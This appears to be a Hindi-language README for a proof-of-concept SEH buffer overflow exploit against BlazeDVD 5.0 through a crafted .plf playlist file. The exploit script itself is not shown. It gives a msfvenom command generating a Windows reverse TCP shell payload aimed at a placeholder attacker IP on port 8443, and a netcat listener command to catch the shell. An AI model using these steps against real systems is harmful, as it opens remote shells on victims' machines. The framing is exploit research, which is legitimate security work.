
BlazeDVD 5.0 के लिए एक निर्मित .plf प्लेलिस्ट फ़ाइल के माध्यम से SEH बफर ओवरफ्लो शोषण का प्रूफ-ऑफ-कॉन्सेप्ट, जो शैक्षिक सुरक्षा अनुसंधान के लिए msfvenom के साथ एक रिवर्स शेल पेलोड उत्पन्न करता है।
प्रूफ़-ऑफ़-कॉन्सेप्ट (PoC) एक्सप्लॉइट जो BlazeDVD संस्करण 5.0 में एक क्राफ्टेड .plf प्लेलिस्ट फ़ाइल के माध्यम से बफ़र ओवरफ़्लो भेद्यता को लक्षित करता है। यह एक्सप्लॉइट कोड निष्पादन प्राप्त करने के लिए SEH (स्ट्रक्चर्ड एक्सेप्शन हैंडलर) ओवरराइट का उपयोग करता है।
.plf फ़ाइल के माध्यम से बफ़र ओवरफ़्लोयह कोड केवल शैक्षिक और शोध उद्देश्यों के लिए है। इस कोड का कोई भी दुरुपयोग स्थानीय या अंतर्राष्ट्रीय कानूनों का उल्लंघन कर सकता है। मैं अनुचित उपयोग से होने वाली क्षति के लिए कोई जिम्मेदारी नहीं लेता।
यह एक्सप्लॉइट एक दुर्भावनापूर्ण .plf फ़ाइल उत्पन्न करता है, जिसे BlazeDVD में खोलने पर बफ़र ओवरफ़्लो ट्रिगर होता है और SEH (स्ट्रक्चर्ड एक्सेप्शन हैंडलर) ओवरराइट हो जाता है, जिससे निष्पादन रिवर्स शेल पेलोड पर रीडायरेक्ट हो जाता है।
msfvenom के साथ शेलकोड उत्पन्न करें
बैड कैरेक्टर्स से बचने के लिए msfvenom का उपयोग करके रॉ फ़ॉर्मेट में एक रिवर्स शेल पेलोड बनाएँ।
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
शेलकोड को एक्सप्लॉइट स्क्रिप्ट के अंदर msfvenom के आउटपुट से बदलें।
Netcat (लिसनर) प्रारंभ करें
दूसरे टर्मिनल में, चयनित पोर्ट 8443 पर सुनना प्रारंभ करें:
nc -lvnp 8443
Catch the Reverse Shell यदि सफल होता है, तो एक रिवर्स शेल आपके लिसनर से कनेक्ट होगा।